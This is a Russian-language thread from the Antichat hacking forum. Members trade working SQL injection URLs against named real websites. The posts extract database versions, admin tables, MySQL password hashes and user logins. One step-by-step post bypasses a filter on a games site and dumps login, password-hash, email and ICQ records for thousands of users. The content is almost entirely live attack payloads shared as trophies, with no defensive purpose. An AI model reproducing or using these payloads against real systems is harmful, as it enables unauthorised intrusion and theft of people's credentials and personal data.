Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.04.2007, 15:29
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.sequelvc.com/index.php?page=news&id=843+union+select+concat(database(),0x3a,version()),2/*
Код:
http://www.vingarbutt.com/index.php?page=news&more=1&id=-69+union+select+1,2,3,4,5,6,7,email,9,10+from+users+limit+5/*
Код:
http://www.iratiwanti.org/iratiwanti.php3?page=news&id=-242+union+select+1,2,3,4,5,6,7,8,9/*
|
|
|
08.04.2007, 15:50
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Сообщение от ShadOS
У меня всё прекрасно выводит:
Код:
_http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7,8,9,10,11,12/*
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно. У меня все выводиться
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+2,2/*
лимитом перебираем таблицы, подом колонки получаем базу.
управление:Opera 9.10
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
08.04.2007, 16:12
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Constantine, а из таблицы admin почему тогда данные не выводятся? Таблица присутствует:
Код:
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12%20+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
Так что извиняй, это не то что хотелось бы. Дело в том, что даже простое обращение типа вот этого:
Код:
http://www.marycoughlanmusic.com/shop.php?id=-47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
Уже не работает!
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
Последний раз редактировалось ShadOS; 08.04.2007 в 16:19..
|
|
|
|
08.04.2007, 16:17
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Опять времени много =)
Цель - www.gamesplay.ru
Заходим по первой попавшейся ссылке. Видно, что движок самописный... Сразу же начинаем пихать левые параметры...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 21-1
Название игры не меняется, так как за вывод названия отвечает другая переменная. Меняется само описание, так что все ок!
Подбираем стотлбцы и зануляем запрос.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20+order+by+5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20+union+select+1,2,3,4,5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,3,4,5
Теперь пробуем вывести чуток данных из таблицы.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,user(),4,5
Облом, други! Но мы то с вами не так себе, прорвемся! 
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(use r(),0x55),0x55),4,5
Теперь все ок. Ну а дальше...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(col umn_name,0x55),0x55),4,5+from+information_schema.c olumns+where+table_name='users'
Итак, финал!
login : md5(pass) : mail : icq
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(con cat(user_login,char(58),user_pass,char(58),user_ma il,char(58),user_icq),0x55),0x55),4,5+from+users
PS Пользователей не считал, но очень много =) |
|
|
|
08.04.2007, 16:19
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
www.generationsims2.com
фанатам Sims 2 посвящаеться:
Код:
http://www.generationsims2.com/news_com.php?idnews=-1+union+select+1,concat(user_id,0x3a,user_password),3,4,5+from+phpbb_users/*
|
|
|
|
08.04.2007, 16:30
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
http://gorodok.samaratoday.ru/showNews.php?idnews=-1385+union+select+1,2,USER(),4,5,6,7,8,9,10/*
самара =\
|
|
|
|
08.04.2007, 16:32
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
Код:
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,database(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,version(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,user(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+union+select+1,password,3,4,5,6,7,8,9+from+mysql.user/*
|
|
|
|
08.04.2007, 16:36
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.elementemag.com/detail.php?page=news&id=14+union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+mysql.user+limit+2/*
|
|
|
|
08.04.2007, 16:50
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от Fr-Ron
PS Пользователей не считал, но очень много =)
считать их не надо  они вычисляются тем же самым limit'ом,юзеров 13549
|
|
|
|
08.04.2007, 17:21
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
мертвая скуля... |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
